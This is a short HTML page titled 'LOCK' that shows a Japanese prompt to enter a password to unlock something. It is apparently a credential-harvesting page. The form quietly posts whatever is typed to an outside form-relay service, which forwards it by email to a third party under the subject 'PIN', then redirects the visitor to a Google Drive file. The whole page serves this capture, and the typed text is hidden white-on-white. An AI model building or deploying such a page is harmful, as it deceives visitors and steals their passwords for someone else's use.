<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8" />
		<script type="text/javascript" charset="UTF-8"></script>
		  <style type="text/css">
		  input{
    color:white;
    background-color:#ffffff;
    font-size:2em;
    position: relative;
    height: 2.5em;
    width: 100%;
    top: 10em;
    left: 50%;
    transform: translate(-50%,-50%);
    text-align:center ;
    line-height:0.5em;
    border:7px solid #550000;
}
.button {
  display       : inline-block;
  border-radius : 0%;          /* 角丸       */
  font-size     : 42pt;        /* 文字サイズ */
  text-align    : center;      /* 文字位置   */
  cursor        : pointer;     /* カーソル   */
  padding       : 27px 100px;   /* 余白       */
  background    : #222222;     /* 背景色     */
  color         : rgba(255, 255, 255, 1);     /* 文字色     */
  line-height   : 1em;         /* 1行の高さ  */
  transition    : .3s;         /* なめらか変化 */
  box-shadow    : 0px 0px 0px #666666;  /* 影の設定 */
  border        : 3px solid #550000;    /* 枠の指定 */
}
.button:hover {
  box-shadow    : none;        /* カーソル時の影消去 */
  color         : #00007f;     /* 背景色     */
  background    : rgba(255, 255, 255, 0.98);     /* 文字色     */
}
</style>
		<title>LOCK</title>
	</head>
	<body bgcolor="#000000">
		<form action="https://api.staticforms.xyz/submit" method="post">
  <input type="password" name="name" placeholder="パスワードを入力してください">    
  <br>
  <input type="hidden" name="accessKey" value="42a03448-d9e7-46c7-b345-fee5048849db">
  <input type="hidden" name="subject" value="暗証番号">
  <input type="hidden" name="replyTo" value="zonago@choco.la">
  <input type="hidden" name="redirectTo" value="https://drive.google.com/file/d/1y7rjjfVj8FZPcEixiXMeIBXc3uG5NizG/view?usp=drivesdk">
  <input type="submit" valSuitit="解除" class="button">
</form>
	</body>
</html>
